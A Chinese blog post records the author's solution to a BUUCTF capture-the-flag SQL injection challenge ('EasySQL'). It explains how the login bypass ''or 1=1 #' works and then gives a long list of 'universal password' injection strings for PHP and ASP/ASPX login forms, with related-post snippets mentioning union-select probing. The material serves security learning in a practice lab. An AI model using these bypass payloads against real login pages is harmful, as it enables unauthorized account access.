BUUCTF: [极客大挑战 2019]EasySQL 1

已于 2022-09-26 16:41:27 修改
阅读量646 收藏 7
点赞数 1
分类专栏: 极客大挑战 文章标签: php sql 数据库
于 2022-09-26 16:05:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anyhowanywhere/article/details/127055178
版权

BUUCTF: [极客大挑战 2019]EasySQL 1

记录 sql 注入题

账号 'or 1=1 #
密码任意
(这个很好用!)

一般的验证语句为
select * from table_name where username=‘admin’ or 1=1#’ and passwords =‘‘ssss’’

账号中的’使前面的引号闭合,or 1=1 使语句恒成立,最后的#号会注释掉#之后的语句,避免报错,所以sql语句返回真值,成功绕过验证,得到flag

学习内容:

phpPHP万能密码
'or 1=1/*
"or “a”="a
"or 1=1–
“or”="
“or”="a’='a
"or1=1–
“or=or”
'‘or’=‘or’
') or (‘a’='a
‘.).or.(’.a.’=’.a
'or 1=1
'or 1=1–
'or 1=1/*
‘or"="a’='a
‘or’ ‘1’=‘1’
‘or’’=’
‘or’’=’‘or’’=’
‘or’=‘1’
‘or’=‘or’
'or.‘a.’='a
'or1=1–
1’or’1’='1
a’or’ 1=1–
a’or’1=1–
or ‘a’=‘a’
or 1=1–
or1=1–
aspaspx万能密码
"or “a”="a
‘.).or.(’.a.’=’.a
or 1=1–
'or 1=1–
a’or’ 1=1–
"or 1=1–
'or.‘a.’='a
“or”="a’='a
‘or’’=’
‘or’=‘or’
admin’or 1=1#

本文只为记录学习 如有侵权请联系作者删除

小*-^-*九
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
GeekUniversityWebTask:极客大学前端训练营作业
04-18
【标题】"极客大学前端训练营作业"揭示了这个压缩包内容主要涉及的是极客大学(GeekUniversity)组织的前端开发学习任务。在这个训练营中,学员们可能通过一系列练习和项目来提升自己的前端技能,特别是JavaScript...
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4243
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
[极客挑战 2019]EasySQL1
tomatoff的博客
03-09 4119
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
BUUCTF [极客挑战 2019]EasySQL 1
最新发布
YueXuan_521的博客
05-07 288
BUUCTF [极客挑战 2019]EasySQL 1
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 8684
SQL注入。
[极客挑战 2019]EasySQL 1
天天学安全专属博客
03-04 1222
[极客挑战 2019]EasySQL 1,暴力破击,弱口令,万能密码
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
微信小程序demo:极客学院
03-15
一个同学的毕业设计,微信小程序也可以做成毕业设计了吗?   免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的...
微信小程序学习用demo:极客学院
03-15
点评:简单的两个页面:   免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系网站客服处理。
GeeksCoding:极客编码
05-09
在“GeeksCoding:极客编码”项目中,我们聚焦于提升编程技能,特别是针对Java和JavaScript这两种广泛使用的编程语言。这个项目包含了针对Java 8和JavaScript(包括ES5和ES6版本)的编码练习,旨在帮助开发者磨练他们...
buuctf[极客挑战 2019]EasySQL1解题思路
m0_73734159的博客
10-14 342
经过测试,发现username和password两个参数都可以分别注入和同时注入。可以看到是一个登录窗口,题目已经说了是SQL注入。首先试一下弱口令,admin,123。既然是第一道题,那应该是很简单了。回显报错,存在SQL字符型注入。判断是数字型还是字符型。
[BUUCTF]极客挑战 2019EasySQL1 write up
GZWZ_的博客
03-25 3158
这道题很简单,就是想推一下万能密码,So浅写一下啦!
极客挑战 2019EasySQL
Knsec
05-13 8739
[极客挑战 2019] EasySQL 判断是数字还是字符型注入 正常查询的回显 输入字符型判断一下,发现报错了,看报错显示 ‘1’‘’,输入的是1’,这里查询语句中应该是存在一个单引号的,所以这里报错了,多了一个单引号,说明这里存在字符型的注入,先用万能钥匙测测 使用万能钥匙一测,第一次 正常回显错误,然后又用字符型的测了一下,发现这里的报错中带有 一部分的查询语句 # 万能公式 1 and 1=1 1' and '1'='1 1 or 1=1 1' or '1'='1
BUUCTF】[极客挑战 2019]EasySQL 1
qq_45972928的博客
05-06 957
根据题目可知,这是大概率是一道SQL注入题 知识点——万能密码原理: 原本查询username = ’username‘,我们要尝试对引号进行闭合,所以当username=1’ or’1’='1时,id = '1’ or ‘1’=‘1’,成功闭合了两边的引号并加上了我们写的语句 1、进入网站 2、尝试登录 3、加单引号,双引号等方法粗略判断是否存在注入 4、可以看到存在注入点,而且这是极大可能是一个单引号的字符型注入。尝试单引号相关的万能密码 username=1’ or ‘1’=‘1&
BUUCTF[极客挑战 2019]EasySQL1
weixin_53955759的博客
06-14 665
打开环境是一个登录页面
BUUCTF [SUCTF 2019]EasySQL1 做题笔记/心得(自留)
m0_74449411的博客
10-29 255
本篇并不作为一篇write up,仅记录自己的部分观点以及思考过程,此题在该站上已经有了许多优质题解,大家可以先去熟悉题目以及解法思路之后再来阅读该篇文章,而笔者作为一名web新人,基础较差,很多地方看待问题存在钻牛角尖以及常识缺乏问题,欢迎大家提议讨论,在不久的将来如果实力成熟,也会再次回过头来回顾自己如今的思考过程以及产生误区的原因进行分析。
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小*-^-*九

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值